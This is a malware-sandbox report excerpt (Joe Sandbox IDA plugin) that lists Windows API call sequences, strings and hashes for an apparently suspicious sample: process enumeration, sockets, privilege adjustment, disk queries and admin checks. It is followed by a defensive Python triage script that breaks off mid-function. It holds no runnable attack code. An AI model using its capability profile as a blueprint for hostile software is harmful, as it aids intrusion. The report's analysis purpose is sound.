                                                                            • Instruction Fuzzy Hash: 3A21BF316002009FCB12EF68C985F6EB7E9EF48721F118598F956BB3E2CB30AD458B51
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00346554
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00346564
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00346583
                                                                            • __wsplitpath.LIBCMT ref: 003465A7
                                                                            • _wcscat.LIBCMT ref: 003465BA
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003465F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                            • String ID:
                                                                            • API String ID: 1605983538-0
                                                                            • Opcode ID: 045622432e6f12531e48a3fcd993d44db92fd146cdfa0e9042d427f9b897baa4
                                                                            • Instruction ID: 535f4a21c575c3a9874c90c270bd5bc9e7dd37817914538af34c80f722d431c3
                                                                            • Opcode Fuzzy Hash: 045622432e6f12531e48a3fcd993d44db92fd146cdfa0e9042d427f9b897baa4
                                                                            • Instruction Fuzzy Hash: 5E216571900218ABDB12AFA4DD89FEDB7FCAB46300F5004E5E505EB141D771AF85CB61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$:
                                                                            • API String ID: 0-1507734059
                                                                            • Opcode ID: 668c401303405b6fe8d5c48e0979a3fb41938fc629f17c30baa790649d75e2ce
                                                                            • Instruction ID: c11e7245f315e88e59c59c9e32b9615d795e7d7ce8cdc5d2775645d3a30165c2
                                                                            • Opcode Fuzzy Hash: 668c401303405b6fe8d5c48e0979a3fb41938fc629f17c30baa790649d75e2ce
                                                                            • Instruction Fuzzy Hash: 3C92CF71E0131ACBDF26DF58C8A07ADB7B5BB54310F2581AAE816AB2C1D7709D81CF91
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003413DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($,2;$<2;$|
                                                                            • API String ID: 1659193697-982277254
                                                                            • Opcode ID: 8f4e7ff6f97682f46fb24785dfef7fd92b071c677612e50fc93e6b5f1fb2ad28
                                                                            • Instruction ID: e264b93d2b82149ece72d103157e5d41a2a8473c1a29ae27307e9868fdc4b68b
                                                                            • Opcode Fuzzy Hash: 8f4e7ff6f97682f46fb24785dfef7fd92b071c677612e50fc93e6b5f1fb2ad28
                                                                            • Instruction Fuzzy Hash: AD320775A00B059FC729CF69C4809AAB7F0FF48310B16C56EE59ADB7A1E770E981CB44
                                                                            APIs
                                                                              • Part of subcall function 0035A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0035A84E
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00359296
                                                                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003592B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: 115face81eab991fd4b5783cae0852185662e62d9d6ff22c188d14dbd30481b7
                                                                            • Instruction ID: 109be7cf22756a20166bec469b912dca1556e836b842d6d3665de9b3a8463b8d
                                                                            • Opcode Fuzzy Hash: 115face81eab991fd4b5783cae0852185662e62d9d6ff22c188d14dbd30481b7
                                                                            • Instruction Fuzzy Hash: 8141E170600204AFDB16AF28C852FBE77EDEF48724F048549FA56AF2D2CB749D418B91
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0034EB8A
                                                                            • _wcscmp.LIBCMT ref: 0034EBBA
                                                                            • _wcscmp.LIBCMT ref: 0034EBCF
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0034EBE0
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0034EC0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: e0c8bdbfada214f930d61562041c29d313ff5d45a4497fbe42175ac71a3627e5
                                                                            • Instruction ID: 8e58bc4a431f88f8076c647bef37ddb9ff733519fb79513d82fffcba5eeb1d5e
                                                                            • Opcode Fuzzy Hash: e0c8bdbfada214f930d61562041c29d313ff5d45a4497fbe42175ac71a3627e5
                                                                            • Instruction Fuzzy Hash: 65418C356047029FC71ADF28C491A9AB7E8FF49324F10455DE95A8F3A1DB31BD84CB91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 2c221d09a90489fd4946940149bbf667b35e262e5047329e6a49255c08abd064
                                                                            • Instruction ID: 6dd515f38deadf358053af85958c2c6808339907970276b09c61000f6ff9af29
                                                                            • Opcode Fuzzy Hash: 2c221d09a90489fd4946940149bbf667b35e262e5047329e6a49255c08abd064
                                                                            • Instruction Fuzzy Hash: 9711B2313016146FE7236F26DC44A6F779DEF5A760F058529F849D7281DF30A94287A4
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0031E014,76E20AE0,0031DEF1,0039DC38,?,?), ref: 0031E02C
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0031E03E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 4fc7e551f6e9ce1ce1d97de3efc4cf4e2fff67cc5d8f4968fee6f0f2153bfe83
                                                                            • Instruction ID: 5754994b621282c7db3de772ae3ed04d69fdb515b0b920a5e21e1b7911ef6524
                                                                            • Opcode Fuzzy Hash: 4fc7e551f6e9ce1ce1d97de3efc4cf4e2fff67cc5d8f4968fee6f0f2153bfe83
                                                                            • Instruction Fuzzy Hash: 2AD0A7318007129FC7375F62EC0C6D377D8AF08704F194459E882D2590D7B4D8C08750
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                            • String ID: @$ <$ <$ <
                                                                            • API String ID: 3728558374-954184809
                                                                            • Opcode ID: c08b2ae72663e16ff5daea55650e8456324c594010358c83a126f18ae311e80b
                                                                            • Instruction ID: c08f555c6a1f96a385c60be207f5569c79ab2d9329fec24e3f1914c5f5932ddd
                                                                            • Opcode Fuzzy Hash: c08b2ae72663e16ff5daea55650e8456324c594010358c83a126f18ae311e80b
                                                                            • Instruction Fuzzy Hash: FF72B075D042089FCF2ADF94C881AEEB7B5EF4C300F15C059E919AB251D735AE86CB91
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0031B22F
                                                                              • Part of subcall function 0031B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0031B5A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Proc$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 2749884682-0
                                                                            • Opcode ID: 0f339be3355f279d6a1fca456e0aec9138eb004b0ef28a1a4ab2595238377a47
                                                                            • Instruction ID: 37f1c4f0c5b477ff76d0a88df98fd61df4cf42ce47847290afe412df2c6c193d
                                                                            • Opcode Fuzzy Hash: 0f339be3355f279d6a1fca456e0aec9138eb004b0ef28a1a4ab2595238377a47
                                                                            • Instruction Fuzzy Hash: 92A17B70114004BAD73F6B2A5C88EFFA95CEB4F354F128919F405DA992CB38DC96E272
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003543BF,00000000), ref: 00354FA6
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00354FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: e138524a5bc841f3f809ef04e6836560386abc202d6987465ce5710d0d677d51
                                                                            • Instruction ID: 4e8adbc1b63b87e5e246a35ce77e480892b35c0f764c4646cc8565ffb87b72ec
                                                                            • Opcode Fuzzy Hash: e138524a5bc841f3f809ef04e6836560386abc202d6987465ce5710d0d677d51
                                                                            • Instruction Fuzzy Hash: 88410A71504305BFEB26DE84DC81EBF77BCEB4031AF10406AFA05671A0DB71AE8997A0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \Q;
                                                                            • API String ID: 4104443479-2286717943
                                                                            • Opcode ID: 91add4c65a1eaa0793eae223cef25e6aba128fe18b88c09cb46b96003272ce10
                                                                            • Instruction ID: 7b06741ff809c8e2d0d8563f4bb0044f6b3b9dda8cbd0d4d277d2c5fc9648953
                                                                            • Opcode Fuzzy Hash: 91add4c65a1eaa0793eae223cef25e6aba128fe18b88c09cb46b96003272ce10
                                                                            • Instruction Fuzzy Hash: 7EA26C74E05219CFDB26CF58C4907ADB7B5FF48310F2681A9E859AB391D734AE81CB90
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034E20D
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0034E267
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0034E2B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID:
                                                                            • API String ID: 1682464887-0
                                                                            • Opcode ID: 7393eabff887833a1d63f0680d7e13d9ebab2edcc2d9993e2773aa5fb3b51447
                                                                            • Instruction ID: 29511a805e2b04090ea020ad7f56334e64a824b9b646a51fef50136295ddce8e
                                                                            • Opcode Fuzzy Hash: 7393eabff887833a1d63f0680d7e13d9ebab2edcc2d9993e2773aa5fb3b51447
                                                                            • Instruction Fuzzy Hash: CE216035A10218EFCB01EFA5D885EEDBBF8FF48310F0484A9E945AB291DB31A915CB50
                                                                            APIs
                                                                              • Part of subcall function 0031F4EA: std::exception::exception.LIBCMT ref: 0031F51E
                                                                              • Part of subcall function 0031F4EA: __CxxThrowException@8.LIBCMT ref: 0031F533
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0033B180
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0033B1AD
                                                                            • GetLastError.KERNEL32 ref: 0033B1BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1922334811-0
                                                                            • Opcode ID: a2bca03e211aad67b3523d55609a0d0856a15b04be9d854ae09529ec64e627bf
                                                                            • Instruction ID: 605d8ccd852880087b46ad55db123e17e651c0a68ea5795834ad5e58be0ea1f0
                                                                            • Opcode Fuzzy Hash: a2bca03e211aad67b3523d55609a0d0856a15b04be9d854ae09529ec64e627bf
                                                                            • Instruction Fuzzy Hash: 5D11BCB2800304AFE719AF64DCC6D6BB7ADFB44310B20852EF05697241DBB0FC418B60
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00346623
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00346664
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0034666F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: ff35a759f82d03395b6afc615331e060be2a7c6cab8575ee80d9f8f02ef93181
                                                                            • Instruction ID: b5b8ee10599497babb260ffff6b0d78d928bb2e95f858598ce9ee43bd2c6046f
                                                                            • Opcode Fuzzy Hash: ff35a759f82d03395b6afc615331e060be2a7c6cab8575ee80d9f8f02ef93181
                                                                            • Instruction Fuzzy Hash: B7115E71E01228BFDB119FA8DC45BAEBBFCEB45B10F104152F900E6290D3B05E018BA1
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00347223
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0034723A
                                                                            • FreeSid.ADVAPI32(?), ref: 0034724A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: a43167e64677a6ce9306ea48f7ed3230c807b67d315bbb0b01bb85057c93b534
                                                                            • Instruction ID: 93fd857691eb9ad57ffb94ffa211643827cd6a05d59ed0a8d65b7a2ab949c4d9
                                                                            • Opcode Fuzzy Hash: a43167e64677a6ce9306ea48f7ed3230c807b67d315bbb0b01bb85057c93b534
                                                                            • Instruction Fuzzy Hash: 20F01275904309BFDF05DFE4DD89AEEBBBCEF08301F5044A9A502E21D1E37056449B10
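The three entries above (LookupPrivilegeValueW/AdjustTokenPrivileges, CreateFileW/DeviceIoControl, AllocateAndInitializeSid/CheckTokenMembership) list raw call sequences without interpreting them. The following Python script is an added example, not part of the Joe Sandbox report and not code from the sample: it parses "APIs" blocks in exactly this format, decodes the DeviceIoControl control code with the Windows SDK CTL_CODE field layout, rebuilds the SID from the AllocateAndInitializeSid arguments, and flags the three patterns. The input is a constructed copy of the three entries. Two things are not read from the page and are assumptions: the identifier authority passed to AllocateAndInitializeSid is printed as "?", so SECURITY_NT_AUTHORITY (5), and with it the BUILTIN\Administrators reading of S-1-5-32-544, is assumed; and the name IOCTL_STORAGE_QUERY_PROPERTY for 0x2D1400 comes from the SDK definition, not from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: three "APIs" blocks in the shape of the Joe Sandbox
# function summaries on this page (not the report file itself).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 0031F4EA: std::exception::exception.LIBCMT ref: 0031F51E
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0033B180
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0033B1AD
• GetLastError.KERNEL32 ref: 0033B1BA
Memory Dump Source
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00346623
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00346664
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0034666F
Memory Dump Source
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00347223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0034723A
• FreeSid.ADVAPI32(?), ref: 0034724A
Memory Dump Source
"""

# One bullet of an "APIs" block: optional "Part of subcall function X:" prefix,
# Name.MODULE, optional (arg,...) list, then the "ref: <call site>" the plugin appends.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]   # raw report tokens: bare hex, or "?" when the plugin could not resolve a value
    ref: int          # address of the call site

def parse_entries(text: str) -> List[List[ApiCall]]:
    """Return one list of calls per 'APIs' block, in report order."""
    entries: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            raw = m.group("args") or ""
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
        elif line.strip() == "Memory Dump Source":
            current = None  # block finished; bullets after this belong to other sections

    return entries

def hex_arg(tok: str) -> Optional[int]:
    return None if tok == "?" else int(tok, 16)

# CTL_CODE(DeviceType, Function, Method, Access) bit layout from the Windows SDK.
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
DEVICE_TYPES = {0x2D: "FILE_DEVICE_MASS_STORAGE"}          # only the type this report shows
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}  # SDK constant, assumed as the name

def decode_ioctl(code: int) -> Dict[str, object]:
    """Split a control code into its CTL_CODE fields and name it when known."""
    device = code >> 16
    return {
        "device_type": DEVICE_TYPES.get(device, "0x%X" % device),
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_IOCTLS.get(code),
    }

def sid_from_alloc_args(args: List[str], assumed_authority: int = 5) -> str:
    """Rebuild the SID from AllocateAndInitializeSid(pAuthority, count, sub0..sub7, ...).
    The report prints pAuthority as '?', so the authority (5 = SECURITY_NT_AUTHORITY)
    is an assumption, not a value taken from the page."""
    count = hex_arg(args[1]) or 0
    subs = [hex_arg(a) for a in args[2:2 + count]]
    return "S-1-%d-%s" % (assumed_authority, "-".join(str(s) for s in subs))

def triage(entries: List[List[ApiCall]]) -> List[str]:
    """One finding per analyst-relevant call sequence found in a block."""
    findings: List[str] = []
    for entry in entries:
        by_name = {c.name: c for c in entry}
        names = set(by_name)
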